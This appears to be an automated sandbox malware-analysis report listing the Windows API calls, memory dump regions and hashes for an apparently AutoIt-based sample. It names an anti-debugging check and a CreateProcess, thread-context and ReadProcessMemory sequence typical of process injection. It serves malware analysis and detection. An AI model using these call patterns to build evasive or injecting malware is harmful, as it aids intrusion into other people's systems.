                    APIs
                    • IsThemeActive.UXTHEME ref: 00754992
                      • Part of subcall function 007735AC: __lock.LIBCMT ref: 007735B2
                      • Part of subcall function 007735AC: DecodePointer.KERNEL32(00000001,?,007549A7,007A81BC), ref: 007735BE
                      • Part of subcall function 007735AC: EncodePointer.KERNEL32(?,?,007549A7,007A81BC), ref: 007735C9
                      • Part of subcall function 00754A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00754A73
                      • Part of subcall function 00754A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00754A88
                      • Part of subcall function 00753B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00753B7A
                      • Part of subcall function 00753B4C: IsDebuggerPresent.KERNEL32 ref: 00753B8C
                      • Part of subcall function 00753B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,008162F8,008162E0,?,?), ref: 00753BFD
                      • Part of subcall function 00753B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00753C81
                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007549D2
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                    • String ID:
                    • API String ID: 1438897964-0
                    • Opcode ID: 0933d6fb93b306a524e0ec145e58d49a26b338d4e6b37b904d9ab28e84ff69c2
                    • Instruction ID: 4f9f56280749ffc7a747f4dd221ffe97c104dcb8751f6bfa50490cdbc9e84824
                    • Opcode Fuzzy Hash: 0933d6fb93b306a524e0ec145e58d49a26b338d4e6b37b904d9ab28e84ff69c2
                    • Instruction Fuzzy Hash: 0C116A71908311DBC700EF28E80998ABBF8FF94750F00851EF485932A1EBB89659CB96
                    APIs
                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00755981,?,?,?,?), ref: 00755E27
                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00755981,?,?,?,?), ref: 0078E19C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: d110010b174a26d79620699818420b85f547a281f2d47918740791de31ba49bb
                    • Instruction ID: d3b9b94ec14e03740beae477e4e3fb684dbc911bc7da7100379577a51a2cfbe1
                    • Opcode Fuzzy Hash: d110010b174a26d79620699818420b85f547a281f2d47918740791de31ba49bb
                    • Instruction Fuzzy Hash: D4018070284608BEF3241E24CC9AFA63B9CAB01769F108319FEE55A1E0C6F91E498B54
                    APIs
                      • Part of subcall function 0077594C: __FF_MSGBANNER.LIBCMT ref: 00775963
                      • Part of subcall function 0077594C: __NMSG_WRITE.LIBCMT ref: 0077596A
                      • Part of subcall function 0077594C: RtlAllocateHeap.NTDLL(011D0000,00000000,00000001,00000000,?,?,?,00771013,?), ref: 0077598F
                    • std::exception::exception.LIBCMT ref: 0077102C
                    • __CxxThrowException@8.LIBCMT ref: 00771041
                      • Part of subcall function 007787DB: RaiseException.KERNEL32(?,?,?,0080BAF8,00000000,?,?,?,?,00771046,?,0080BAF8,?,00000001), ref: 00778830
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                    • String ID:
                    • API String ID: 3902256705-0
                    • Opcode ID: fbc25c1c049cf44e074c01901825335bb3a7a3f9eab8a17c79df87ed2062e208
                    • Instruction ID: f1b351b1f61827455b60c9183e161a1122bf4a6394c303415d1fe05429245982
                    • Opcode Fuzzy Hash: fbc25c1c049cf44e074c01901825335bb3a7a3f9eab8a17c79df87ed2062e208
                    • Instruction Fuzzy Hash: 2BF0F43464025DE6CF20EA9CEC09ADF77AC9F003D0F608425F90C96182EFF89A91D2E1
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __lock_file_memset
                    • String ID:
                    • API String ID: 26237723-0
                    • Opcode ID: ae9d1fcc397d940a832e24e3c1a71191e0f5945b72ddaa5f71021c6cdadb3a05
                    • Instruction ID: 337e3d9dc1f240713db62682d8731da08466e836d484096f5415b2ae5a8b6435
                    • Opcode Fuzzy Hash: ae9d1fcc397d940a832e24e3c1a71191e0f5945b72ddaa5f71021c6cdadb3a05
                    • Instruction Fuzzy Hash: F6018871C00604EBCF51AFA5CC0999E7B61BF403E0F14C215F81C5A1A1DB798651DB92
                    APIs
                      • Part of subcall function 00778D68: __getptd_noexit.LIBCMT ref: 00778D68
                    • __lock_file.LIBCMT ref: 0077561B
                      • Part of subcall function 00776E4E: __lock.LIBCMT ref: 00776E71
                    • __fclose_nolock.LIBCMT ref: 00775626
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                    • String ID:
                    • API String ID: 2800547568-0
                    • Opcode ID: 2c868f2c19c4a6da4ce27f667804054267d1de3733e9b7ca0fa9b65a6cbd2d02
                    • Instruction ID: 76dd5afdacce1878262677010bc6db30a3c0f12977f1968636e21aa4529c5bfa
                    • Opcode Fuzzy Hash: 2c868f2c19c4a6da4ce27f667804054267d1de3733e9b7ca0fa9b65a6cbd2d02
                    • Instruction Fuzzy Hash: EAF09071941A04DADF60AB75C80EB6E76A16F41BF4F55C209A42CEB1C1CFBC8A019B56
                    APIs
                    • CreateProcessW.KERNELBASE(?,00000000), ref: 036C1A5B
                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 036C1AF1
                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 036C1B13
                    Memory Dump Source
                    • Source File: 00000000.00000002.2110433162.00000000036C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_36c0000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                    • String ID:
                    • API String ID: 2438371351-0
                    • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                    • Instruction ID: 737e8f489b2f2c9bab290c33d567de15d444bc1bce531f402c63faf05a0f452b
                    • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                    • Instruction Fuzzy Hash: B512BD24E24658C6EB24DF64D8507DEB232EF69300F1090ED910DEB7A5E77A4E81CF5A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9cf93666c6ac64ca7b2208de7103c5a0d21116eddf42269dc58bd01122f69077
                    • Instruction ID: 858446639d004ed61faec888caee554979b7eae05f7e9826a56cf902d90ba0bb
                    • Opcode Fuzzy Hash: 9cf93666c6ac64ca7b2208de7103c5a0d21116eddf42269dc58bd01122f69077
                    • Instruction Fuzzy Hash: 69518E34600604EFCF14EB64C9A9EAE77A5AF85720F148168FD06AB292DB38FD05CB51
                    APIs
                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00755CF6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: b249ec2433366d9a5810b0daa68c535683cf6370932a67d472bc29e55d451869
                    • Instruction ID: 21ee718bb01a4b1efc78da3efe7aa0c90993f828a43c905c5345fbb7758c5c48
                    • Opcode Fuzzy Hash: b249ec2433366d9a5810b0daa68c535683cf6370932a67d472bc29e55d451869
                    • Instruction Fuzzy Hash: A2315A31A00B0AABCB18DF6DC494AADB7B1FF48311F148629EC1993710D7B5A964DBA0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: 4913c7dd020385968957f03bc723a9c127e7a34ddaddf0bef54eb49a268c8a84
                    • Instruction ID: 2d6016226db2d7c42b3aef0ae0bb860d1275a85374c76c71ca09a4083192a84e
                    • Opcode Fuzzy Hash: 4913c7dd020385968957f03bc723a9c127e7a34ddaddf0bef54eb49a268c8a84
                    • Instruction Fuzzy Hash: 02410874604341DFDB14DF14C488B5ABBE1BF45318F1989ACE9994B362C379EC49CB52
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    • Opcode ID: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                    • Instruction ID: 57379e327b59c4d1cf7259446cf266e253d5d5e4f7985f47f9c34cc9b5370c34
                    • Opcode Fuzzy Hash: 64602025b210a69d44d795642d596fdfc93abb49ffaa1266944914acc7b2a18e
                    • Instruction Fuzzy Hash: C511E431208205AFD718DF2CD485CAEB3A8EF45360724851AED19DB290DB76AC15CBD0
                    APIs
                      • Part of subcall function 00754D13: FreeLibrary.KERNEL32(00000000,?), ref: 00754D4D
                      • Part of subcall function 0077548B: __wfsopen.LIBCMT ref: 00775496
                    • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,008162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754F6F
                      • Part of subcall function 00754CC8: FreeLibrary.KERNEL32(00000000), ref: 00754D02
                      • Part of subcall function 00754DD0: _memmove.LIBCMT ref: 00754E1A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Library$Free$Load__wfsopen_memmove
                    • String ID:
                    • API String ID: 1396898556-0
                    • Opcode ID: b90145105b8f2335d6531fde513e3877a5f0a24a2d7e041344d9de6303254cc8
                    • Instruction ID: 9b85996ae213e75c27b11bea8dabc6836dfdf15f2f7e8367d93d9561e93f5a78
                    • Opcode Fuzzy Hash: b90145105b8f2335d6531fde513e3877a5f0a24a2d7e041344d9de6303254cc8
                    • Instruction Fuzzy Hash: B111C432700305EACB24FF74CC1ABEE77A49F40706F10842AFD42A61C1DEB99A4997A0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ClearVariant
                    • String ID:
                    • API String ID: 1473721057-0
                    • Opcode ID: 1e90bcf655e06b124d9762bda804806b7732ba704b766c30ce7c178e8bcc29bc
                    • Instruction ID: 06a09da074c547cfc41c2e4ae2cc0e8e6e0f14fa9d506e5e51e3cb69596bc5ea
                    • Opcode Fuzzy Hash: 1e90bcf655e06b124d9762bda804806b7732ba704b766c30ce7c178e8bcc29bc
                    • Instruction Fuzzy Hash: 522124B4608341DFCB14DF24C449A5ABBF0BF88304F04896CE98A47721D779E849CB92
                    APIs
                    • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00755807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00755D76
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: 13c0c0a2d4738f324bcee4e07cc793ca3f7402786a8be978337e13af1ed5789c
                    • Instruction ID: d3de1e7798d195f84ab8001f1c0cfba16abe6b109fe3a9da55cccd6c7601d16d
                    • Opcode Fuzzy Hash: 13c0c0a2d4738f324bcee4e07cc793ca3f7402786a8be978337e13af1ed5789c
                    • Instruction Fuzzy Hash: 2F113A32200B059FD3308F15C498BA2B7F5EF45751F14C92EE8AA86A50D7B9E949CB60
                    APIs
                    • __lock_file.LIBCMT ref: 00774AD6
                      • Part of subcall function 00778D68: __getptd_noexit.LIBCMT ref: 00778D68
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __getptd_noexit__lock_file
                    • String ID:
                    • API String ID: 2597487223-0
                    • Opcode ID: f4442efe19712182886ca9c0ec92345d44931dd1abd569fb307b658338810eb7
                    • Instruction ID: b0e3878bb30b81d8cde267bd33240aaf88a82152fa9b6f6fe86a6d583b79054a
                    • Opcode Fuzzy Hash: f4442efe19712182886ca9c0ec92345d44931dd1abd569fb307b658338810eb7
                    • Instruction Fuzzy Hash: 26F0A471940209DBDFA1AF74CC0E79E3661AF003A5F05C514F42C9A1E1CB7C8950DF51
                    APIs
                    • FreeLibrary.KERNEL32(?,?,008162F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00754FDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: dcd0d1a8eba5f5b60ce762266c1aff30878f14b080df23a684a7caa9d7a068f8
                    • Instruction ID: eee0fb71e6c985d6b62a3314a1579a11ab5c962b3c24c7cc9a1f9c43fadf9e2c
                    • Opcode Fuzzy Hash: dcd0d1a8eba5f5b60ce762266c1aff30878f14b080df23a684a7caa9d7a068f8
                    • Instruction Fuzzy Hash: BFF03071105711CFCB349F68D494852BBF1BF0432A3288A3EE9D782650C7B99898DF50
                    APIs
                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007709F4
                      • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: LongNamePath_memmove
                    • String ID:
                    • API String ID: 2514874351-0
                    • Opcode ID: 085f7ec440f578a7176cf434be8f9b1561513460affa0a80cc4d5f601671569a
                    • Instruction ID: 93d51480866b3feb73c196d87c2d80b8112b3f080dfbf324821a5947876f5a4f
                    • Opcode Fuzzy Hash: 085f7ec440f578a7176cf434be8f9b1561513460affa0a80cc4d5f601671569a
                    • Instruction Fuzzy Hash: AEE0CD76A4522C97C720E6589C09FFA77FDDF88791F0441B6FC0CD7244E9A5AC818690
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __fread_nolock
                    • String ID:
                    • API String ID: 2638373210-0
                    • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction ID: 4f921e83a5e53f998686c0c67a99ed12a5746348ad61835b44af2eafafe11f8b
                    • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction Fuzzy Hash: 54E092B0104B049FDB348A28D8147E373E0AB06315F00081DF3AA83341EB6778419759
                    APIs
                    • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0078E16B,?,?,00000000), ref: 00755DBF
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: 0e2a40cadda341365a94222d4fd50b338bc8f7d6406bfb8110bf3b8c29a1215f
                    • Instruction ID: 8882da7e175761d99400c7f9e97f434cc06eee99141a8b48d890a2bad8c274b9
                    • Opcode Fuzzy Hash: 0e2a40cadda341365a94222d4fd50b338bc8f7d6406bfb8110bf3b8c29a1215f
                    • Instruction Fuzzy Hash: 68D0C77464020CBFE710DB80DC46FA9777CD705710F104195FD0456290D6B27D508795
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __wfsopen
                    • String ID:
                    • API String ID: 197181222-0
                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction ID: 6c32f6abe5a8c2872584f5f5855b410fbfd7bb3fa0f240d0a093b9aea3742cf7
                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction Fuzzy Hash: 99B0927684020CB7DE012F92EC06A593B199B406B8F808020FB0C18162A6B7A6A09689
                    APIs
                    • GetLastError.KERNEL32(00000002,00000000), ref: 007BD46A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID:
                    • API String ID: 1452528299-0
                    • Opcode ID: b24a7f320606d951c73c039583b97723c8c0b0228e93e9cf91ef3d5c0f8f77af
                    • Instruction ID: 22dfd1f301173a9a573a0585321e2de5284b71bd1780a2b65f8c7e13439e21f4
                    • Opcode Fuzzy Hash: b24a7f320606d951c73c039583b97723c8c0b0228e93e9cf91ef3d5c0f8f77af
                    • Instruction Fuzzy Hash: 13719434204341CFC724EF24D495BEAB7E0AF88315F04496DF996972A2EB78ED49CB52
                    APIs
                    Memory Dump Source
